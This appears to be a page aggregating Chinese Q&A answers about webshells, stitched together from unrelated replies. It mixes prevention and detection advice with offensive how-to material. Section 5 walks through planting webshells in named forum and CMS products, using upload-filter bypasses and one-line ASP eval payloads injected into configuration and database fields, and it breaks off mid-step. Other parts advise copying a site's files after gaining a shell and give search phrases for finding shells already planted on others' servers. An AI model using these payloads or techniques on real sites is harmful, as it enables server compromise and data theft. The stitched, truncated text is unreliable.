1. 網站被入侵了傳了webshell怎麼辦
如何防止網站被上傳WebShell網頁木馬?
1 )網站伺服器方面,開啟系統自帶的防火牆,增強管理員賬戶密碼強度等,更改遠程桌面埠,定期更新伺服器補丁和殺毒軟體。
2)定期的更新伺服器系統漏洞(windows 2008 2012、linux centos系統),網站系統升級,盡量不適用第三方的API插件代碼。
3)如果自己對程序代碼不是太了解的話,建議找網站安全公司去修復網站的漏洞,以及代碼的安全檢測與木馬後門清除,國內推薦SINE安全公司、綠盟安全公司、啟明星辰等的網站安全公司,做深入的網站安全服務,來保障網站的安全穩定運行,防止網站被掛馬之類的安全問題。
4)盡量不要把網站的後台用戶的密碼設置的太簡單化,要符合10到18位的大小寫字母+數字+符號組合。
5)網站後台管理的路徑一定不能用默認的admin或guanli或manage 或文件名為admin.asp的路徑去訪問。
6)伺服器的基礎安全設置必須要詳細的做好,埠的安全策略,注冊表安全,底層系統的安全加固,否則伺服器不安全,網站再安全也沒用
2. 拿到webshell後怎樣下載網站文件
傳個rar的工具,然後使用命令就可以打包下來。但是不可以打包資料庫。
3. 如何下載別人網站上的php文件
php文件是處理過的才顯示出來,php內容是看不見的,
4. php怎麼拿到webshell
拿shell學習可以去,烏龍寺技術站
5. 自己網站怎麼拿WEBSHELL
一、直接上傳獲得webshell
這種對php和jsp的一些程序比較常見,MolyX BOARD就是其中一例,直接在心情圖標管理上傳.php類型,雖然沒有提示,其實已經成功了,上傳的文 件url應該是http://forums/images/smiles/下,前一陣子的聯眾游戲站和網易的jsp系統漏洞就可以直接上傳jsp文件。文件名是原來的文件名,bo-blog後台可以可以直接上傳.php文件,上傳的文件路徑有提示。以及一年前十分流行的upfile.asp漏洞(動網5.0和6.0、早期的許多整站系統),因過濾上傳文件不嚴,導致用戶可以直接上傳webshell到網站任意可寫目錄中,從而拿到網站的管理員控制許可權。
二、添加修改上傳類型
現在很多的腳本程序上傳模塊不是只允許上傳合法文件類型,而大多數的系統是允許添加上傳類型,bbsxp後台可以添加asa|asP類型,ewebeditor的後台也可添加asa類型,通過修改後我們可以直接上傳asa後綴的webshell了,還有一種情況是過濾了.asp,可以添加.aspasp的文件類型來上傳獲得webshell。php系統的後台,我們可以添加.php.g1f的上傳類型,這是php的一個特性,最後的哪個只要不是已知的文件類型即可,php會將php.g1f作為.php來正常運行,從而也可成功拿到shell。LeadBbs3.14後台獲得webshell方法是:在上傳類型中增加asp ,注意,asp後面是有個空格的,然後在前台上傳ASP馬,當然也要在後面加個空格!
三、利用後台管理功能寫入webshell
上傳漏洞基本上補的也差不多了,所以我們進入後台後還可以通過修改相關文件來寫入webshell。比較的典型的有dvbbs6.0,還有leadbbs2.88等,直接在後台修改配置文件,寫入後綴是asp的文件。而LeadBbs3.14後台獲得webshell另一方法是:添加一個新的友情鏈接,在網站名稱處寫上冰狐最小馬即可,最小馬前後要隨便輸入一些字元,http:\\網站\inc\IncHtm\BoardLink.asp就是我們想要的shell。
四、利用後台管理向配置文件寫webshell
利用"""":""//"等符號構造最小馬寫入程序的配置文件,joekoe論壇,某某同學錄,沸騰展望新聞系統,COCOON Counter統計程序等等,還有很多php程序都可以,COCOON Counter統計程序舉例,在管理郵箱處添上cnhacker at 263 dot net":eval request(chr (35))//, 在配製文件中就是webmail="cnhacker at 263 dot net\":eval request(chr(35))//",還有一種方法就是寫上cnhacker at 263 dot net"%><%eval request(chr(35))%><%',這樣就會形成前後對應,最小馬也就運行了。<%eval request(chr(35))%>可以用lake2的eval發送端以及最新的2006 客戶端來連,需要說明的是資料庫插馬時候要選前者。再如動易2005,到文章中心管理-頂部菜單設置-菜單其它特效,插入一句話馬"%><%execute request("l")%><%',保存頂部欄目菜單參數設置成功後,我們就得到馬地址http://網站/admin/rootclass_menu_config.asp。
五、利用後台資料庫備份及恢復獲得webshell
主要是利用後台對access資料庫的「備份資料庫」或「恢復資料庫」功能,「備份的資料庫路徑」等變數沒有過濾導致可以把任意文件後綴改 為asp,從而得到webshell,msssql版的程序就直接應用了access版的代碼,導致sql版照樣可以利用。還可以備份網站asp文件為其他後綴 如.txt文件,從而可以查看並獲得網頁源代碼,並獲得更多的程序信息增加獲得webshell的機會。在實際運用中經常會碰到沒有上傳功能的時 候,但是有asp系統在運行,利用此方法來查看源代碼來獲得其資料庫的位置,為資料庫插馬來創造機會,動網論壇就有一個ip地址的資料庫,在後台的ip管理中可以插入最小馬然後備份成.asp文件即可。在談談突破上傳檢測的方法,很多asp程序在即使改了後綴名後也會提示文件非法,通過在.asp文件頭加上gif89a修改後綴為gif來騙過asp程序檢測達到上傳的目的,還有一種就是用記事本打開圖片文件,隨便粘貼一部分復制到asp木馬文件頭,修改gif後綴後上傳也可以突破檢測,然後備份為.asp文件,成功得到webshell。
六、利用資料庫壓縮功能
可以將數據的防下載失效從而使插入資料庫的最小馬成功運行,比較典型的就是loveyuki的L-BLOG,在友情添加的url出寫上<%eval request (chr(35))%>, 提交後,在資料庫操作中壓縮資料庫,可以成功壓縮出.asp文件,用海洋的最小馬的eval客戶端連就得到一個webshell。
七、asp+mssql系統
這里需要提一點動網mssql版,但是可以直接本地提交來備份的。首先在發帖那上傳一個寫有asp代碼的假圖片,然後記住其上傳路徑。寫一個本地提交的表單
6. webshell是哪來的
呃。。。webshell這東西新手確實很容易被搞暈,我們知道shell是一個介面,像linux下有不同的shell,你可以理解成windows的cmd一樣,為用戶提供的一個對系統進行操作的介面.webshell,顧名思意就是一個用web方式為用戶提供的一個操作介面,可以像本地的shell那樣提供服務,黑客將webshell上傳到伺服器上以後,如果許可權允許的話可以進行像本地系統一樣的各種操作。歸根結底,webshell就是一個實現特殊功能的伺服器腳本語言寫的文件,webshell有.net、php、jsp不同語言寫的,運行在不同伺服器上。
網上現在有很多經典的webshell,下載下來後只需將腳本語言中的密碼改成你自己的就行了,如果你會.net、php之類的話還可以自己寫一個適合自己的webshell。至於webshell的沖突是不存在的,上專webshell之後都基本上會改名以達到隱蔽的目的,只要不是在同目錄下同文件名就不會沖突,而且沖突了的話你也傳不上去。
樓主想要學會寫webshell的話就去學php、jsp這樣的伺服器腳本語言吧,本人php程序員,如果樓主想要學習PHP的話可以提供點幫助給你。
回來修改下答案,不為別的,只為鄙視樓上那2B。。。順便檢舉下
7. 懸鏡中的webshell是如何使用的
WebShell是一種常見的網頁後門,它常常被攻擊者用來獲取Web伺服器的操作許可權。攻擊者在進行網站入侵時,通常會將WebShell文件與Web目錄下的長長網頁文件放置在一起,然後通過瀏覽器訪問WebShell文件,從而獲取命令執行環境,最終達到控制網站伺服器的目的。
當網站伺服器被控制後,就可以在其上任意查看資料庫、上傳下載文件以及執行任意程序命令等。WebShell與正常網頁具有相同的運行環境和服務埠,它與遠程主機通過WWW(80)埠進行數據交換的,一次能夠很容易地避開殺毒軟體的檢測和穿透防火牆。
總體,懸鏡伺服器衛士中WebShell的作用,一方面,WebShell常常被站長用於網站管理、伺服器管理等等,根據FSO許可權的不同,作用有在線編輯網頁腳本、上傳下載文件、查看資料庫、執行任意程序命令等。另一方面,被入侵者利用,從而達到控制網站伺服器的目的。
這些網頁腳本常稱為Web腳本木馬,目前比較流行的ASP或PHP木馬,也有基於.NET的腳本木馬。懸鏡伺服器衛士中系統應用防護中WebShell檢測,所要應對的就是後者。
懸鏡伺服器衛士WebShell有以下5種攻擊方式:
1)首先通過系統前台上傳WebShell腳本到網站伺服器,此時,網站伺服器會向客戶端返回上傳文件的整體URL信息;然後通過URL對這個腳本進行訪問,使其可以執行;最終導致攻擊者能夠在網站的任意目錄中上傳懸鏡伺服器衛士WebShell,從而獲取管理員許可權。
2)攻擊者利用管理員密碼登錄進入後台系統,並藉助後台管理工具向配置文件寫入懸鏡伺服器衛士WebShell,允許任意腳本文件上傳。
3)通過資料庫的備份和恢復功能和獲取WebShell。在資料庫備份時,可以將備份文件的擴展名更改為.asp類型。
4)系統中其他站點遭受攻擊,或者搭載在Web伺服器上的Ftp伺服器遭受攻擊後,被注入了WebShell,這些都會導致整個網站系統被感染。
5) 攻擊者利用Web伺服器漏洞直接對其進行攻擊,從而獲得控制許可權。
WebShell的感染過程描述:
1)攻擊者首先通過SQL注入、跨站腳本攻擊等方式得到上傳許可權,然後將WebShell上傳至伺服器。
2)通過WebShell完成對伺服器的控制,實現植入僵屍木馬、篡改網頁以及獲取敏感信息等惡意功能。
3)植入攻擊木馬,使其作為攻擊「肉雞」對整個網站進行感染。
3.4.1.5Linux下WebShell攻擊
WebShell反彈命令行Shell的方式在Linux從操作系統下Web伺服器入侵提權過程中得到了廣泛應用。在Linux下,WebShell可以執行命令,然後溢出卻必須在交互環境中進行,否則即使提權成功,也不能獲得完美利用。
因此,為了完成WebShell攻擊,只需反彈一個Shell命令行窗口,在命令行終端下執行溢出並進行提權。
多數Linux操作系統下的PHP WebShell都通過反彈連接功能獲得一個繼承當前WebShell許可權的Shell命令行窗口。在使用反彈連接功能前,需要首先使用NC工具對一個未使用的埠進行監聽,然後選擇反彈連接方式。
3.4.1.6 WebShell檢測
對於WebShell的檢測,北京安普諾網路安全團隊通過自主研發,設計出一種綜合多種檢測方法的綜合檢測方案。
特徵檢測系統中核心是特徵提取,選取特徵的好壞直接關繫到檢測結果的優劣。因此,在進行特徵選取時,首先應對Web頁面本身進行充分考慮,使得選取的特徵能夠很好地表現出靜態頁面。其次,選取的特徵還應該具有動態特點,可以體現出頁面所進行的操作。
如果提取網頁的全部特徵進行處理,則無法檢測變形的WebShell,也會因為特徵過多而對效率產生影響。如果檢測特徵過少,則有可能產生誤報。通過將多個WebShell庫綜合在一起,同時,又加入公司積累的特徵碼,綜合構建了一個非常強大的WebShell特徵庫,這個特徵庫構成了WebShell檢測的依據。
通過對文件進行特徵庫匹配、文件base64編碼後特徵庫匹配、可疑特徵碼匹配等多種手段進行掃描,從而保證掃描准確性並且降低誤報率。
掃描後,可以具體的提供WebShell的名稱、類型等詳細信息,以供用戶參考。並且針對反饋,用戶還可以有選擇的執行「清理」、「添加信任」等功能,以此實現對WebShell的檢測、發現、處理等操作。
特徵檢測是比較常見的WebShell檢測方法,base64編碼後特徵匹配相對於普通特徵碼檢測的優勢在於匹配的准確性更高誤報率更低。
但是特徵檢測的局限性還是存在的,就是同時降低誤報率和漏報率是很難實現的,所以還需要別的手段對文件進行綜合的檢測。
為此懸鏡伺服器衛士中有Delttime(文件創建時間間隔),Fnum(文件數量閾值)的概念。以特徵屬性、Delttime屬性、Fnum屬性作為Webshell動態檢測演算法的主要3個輸入參數,根據不同參數對檢測結果的影響大小來決定其在演算法中的權重。
實踐證明該演算法檢測效率相對傳統特徵值檢測大幅降低檢測誤報率,有一定的可行性。目前懸鏡伺服器衛士正在申請國家發明專利。與此同時,為了方便用戶使用,軟體給用戶提供「快速掃描」、「自定義掃描」功能。
具體效果,大家可以通過下載使用懸鏡伺服器衛士就知道了。謝謝。希望這個能幫到你。
8. WEBSHELL是什麼
webshell是什麼?
顧名思義,"web" - 顯然需要伺服器開放web服務,"shell" - 取得對伺服器某種程度上操作許可權。
webshell常常被稱為匿名用戶(入侵者)通過WEB服務埠對WEB伺服器有某種程度上操作的許可權,由於其大多是以網頁腳本的形式出現,也有人稱之為網站後門工具。
2、webshell有什麼作用?
一方面,webshell被站長常常用於網站管理、伺服器管理等等,根據FSO許可權的不同,作用有在線編輯網頁腳本、上傳下載文件、查看資料庫、執行任意程序命令等。
另一方面,被入侵者利用,從而達到控制網站伺服器的目的。這些網頁腳本常稱為WEB
腳本木馬,目前比較流行的asp或php木馬,也有基於.NET的腳本木馬。
對於後者我本人是反對的,畢竟人要厚道。
3、webshell的隱蔽性
有些惡意網頁腳本可以嵌套在正常網頁中運行,且不容易被查殺。
webshell可以穿越伺服器防火牆,由於與被控制的伺服器或遠程主機交換的數據都是通過80埠傳遞的,因此不會被防火牆攔截。並且使用webshell一般不會在系統日誌中留下記錄,只會在網站的web日誌中留下一些數據提交記錄,沒有經驗的管理員是很難看出入侵痕跡的。
4、如何防範惡意後門?
從根本上解決動態網頁腳本的安全問題,要做到防注入、防暴庫、防COOKIES欺騙、防跨站攻擊等等,務必配置好伺服器FSO許可權。
希望看過本詞條的人,發表一下你是如何防範惡意WEBSHELL後門的。
9. 什麼是WEBSHELL
……》webshell是web入侵的腳本攻擊工具。簡單的說來,webshell即asp或php木馬後門,黑客在入侵了一個網站後,常常在將這些asp或php木馬後門文件放置在網站伺服器的web目錄中,然後黑客就可以用web的方式,通過asp或php木馬後門控制網站伺服器,包括上傳下載文件、查看資料庫、執行任意程序命令等。
……》webshell 最大的優點就是可以穿越防火牆,由於與被控制的伺服器或遠程主機交換的數據都是通過80埠傳遞的,因此不會被防火牆攔截。並且使用webshell一般不會在系統日誌中留下記錄,只會在網站的web日誌中留下一些數據提交記錄,沒有經驗的管理員是很難看出入侵痕跡的。
10. 什麼是php webshell
webshell是web入侵的腳本攻擊工具。簡單的說來,webshell就是一個asp或php木馬後門,黑客在入侵了一個網站後,常常在將這些asp或php木馬後門文件放置在網站伺服器的web目錄中,與正常的網頁文件混在一起。然後黑客就可以用web的方式,通過asp或php木馬後門控制網站伺服器,包括上傳下載文件、查看資料庫、執行任意程序命令等。
為了更好理解webshell我們學習兩個概念:
什麼是「木馬」?「木馬」全稱是「特洛伊木馬(Trojan Horse)」,原指古希臘士兵藏在木馬內進入敵方城市從而佔領敵方城市的故事。在Internet上,「特洛伊木馬」指一些程序設計人員在其可從網路上下載(Download)的應用程序或游戲中,包含了可以控制用戶的計算機系統的程序,可能造成用戶的系統被破壞甚至癱瘓。
什麼是後門?大家都知道,一台計算機上有65535個埠,那麼如果把計算機看作是一間屋子,那麼這65535個埠就可以它看做是計算機為了與外界連接所開的65535扇門。每個門的背後都是一個服務。有的門是主人特地打開迎接客人的(提供服務),有的門是主人為了出去訪問客人而開設的(訪問遠程服務)——理論上,剩下的其他門都該是關閉著的,但偏偏由於各種原因,很多門都是開啟的。於是就有好事者進入,主人的隱私被刺探,生活被打擾,甚至屋裡的東西也被搞得一片狼跡。這扇悄然被開啟的門——就是「後門」。
webshell的優點
webshell 最大的優點就是可以穿越防火牆,由於與被控制的伺服器或遠程主機交換的數據都是通過80埠傳遞的,因此不會被防火牆攔截。並且使用webshell一般不會在系統日誌中留下記錄,只會在網站的web日誌中留下一些數據提交記錄,沒有經驗的管理員是很難看出入侵痕跡的。
如何尋找webshel:
1,腳本攻擊SQL注入
2,使用注入工具
3,在瀏覽器里打開網路,輸入搜索關鍵詞"在本頁操作不需要FSO支持&"或者"一次只能執行一個操作",然後點擊搜索,很快就可以看到檢索到了大量的查詢結果.